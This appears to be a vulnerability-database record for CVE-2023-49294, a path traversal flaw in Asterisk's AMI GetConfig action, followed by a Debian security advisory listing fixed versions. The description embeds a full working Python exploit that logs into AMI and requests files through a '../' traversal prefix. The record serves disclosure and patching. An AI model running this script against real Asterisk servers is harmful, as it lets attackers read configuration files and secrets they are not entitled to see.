ID

VAR-202312-2340

CVE

CVE-2023-49294

TITLE

Digium  of  Asterisk  Path traversal vulnerabilities in products from multiple vendors such as

DESCRIPTION

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. # Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated) # Date: 2023-03-26 # Exploit Author: Sean Pesce # Vendor Homepage: https://asterisk.org/ # Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/ # Version: 18.20.0 # Tested on: Debian Linux # CVE: CVE-2023-49294 #!/usr/bin/env python3 # # Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that # facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of # file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar # to the common INI configuration format. # # References: # https://nvd.nist.gov/vuln/detail/CVE-2023-49294 # https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f # https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/ import argparse import getpass import socket import sys CVE_ID = 'CVE-2023-49294' DEFAULT_PORT = 5038 DEFAULT_FILE = '/etc/hosts' DEFAULT_ACTION_ID = 0 DEFAULT_TCP_READ_SZ = 1048576 # 1MB def ami_msg(action, args, encoding='utf8'): assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}' assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}' if 'ActionID' not in args: args['ActionID'] = 0 line_sep = '\r\n' data = f'Action: {action}{line_sep}' for a in args: data += f'{a}: {args[a]}{line_sep}' data += line_sep return data.encode(encoding) def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ): assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}' sock.sendall(data) resp = b'' while not resp.endswith(b'\r\n\r\n'): resp += sock.recv(read_sz) return resp if __name__ == '__main__': # Parse command-line arguments argparser = argparse.ArgumentParser() argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server') argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT) argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True) argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None) argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE) argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID) if '-h' in sys.argv or '--help' in sys.argv: print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr) argparser.print_help() sys.exit(0) args = argparser.parse_args() # Validate command-line arguments assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}' args.host = socket.gethostbyname(args.host) if args.password is None: args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ') print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr) print(f'[INFO] Connecting to Asterisk AMI: {args.user}@{args.host}:{args.port}', file=sys.stderr) # Connect to the Asterisk AMI server sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.connect((args.host, args.port)) # Read server banner banner = sock.recv(DEFAULT_TCP_READ_SZ) print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr) # Authenticate to the Asterisk AMI server login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password}) login_resp = tcp_send_rcv(sock, login_msg) while b'Authentication' not in login_resp: login_resp = tcp_send_rcv(sock, b'') if b'Authentication accepted' not in login_resp: print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr) sys.exit(1) #print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr) print(f'[INFO] Login success', file=sys.stderr) # Obtain file data via path traversal traversal = '../../../../../../../../' cfg_msg = ami_msg('GetConfig', { 'ActionID': args.action_id, 'Filename': f'{traversal}{args.file}', #'Category': 'default', #'Filter': 'name_regex=value_regex,', }) resp = tcp_send_rcv(sock, cfg_msg) while b'Response' not in resp: resp = tcp_send_rcv(sock, b'') print(f'', file=sys.stderr) print(f'{resp.decode("utf8")}') if b'Error' in resp: sys.exit(1) pass # Done . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033 Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange. CVE-2023-37457 The 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. CVE-2023-38703 PJSIP is a free and open source multimedia communication library written in C with high level API in C, C++, Java, C#, and Python languages. SRTP is a higher level media transport which is stacked upon a lower level media transport such as UDP and ICE. Currently a higher level transport is not synchronized with its lower level transport that may introduce a use-after-free issue. This vulnerability affects applications that have SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media transport other than UDP. This vulnerability’s impact may range from unexpected application termination to control flow hijack/memory corruption. CVE-2023-49786 Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4. We recommend that you upgrade your asterisk packages. For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

TYPE

info disclosure

EXTERNAL IDS

REFERENCES

CREDITS

Sean Pesce

SOURCES

LAST UPDATE DATE

2024-08-14T14:30:07.750000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE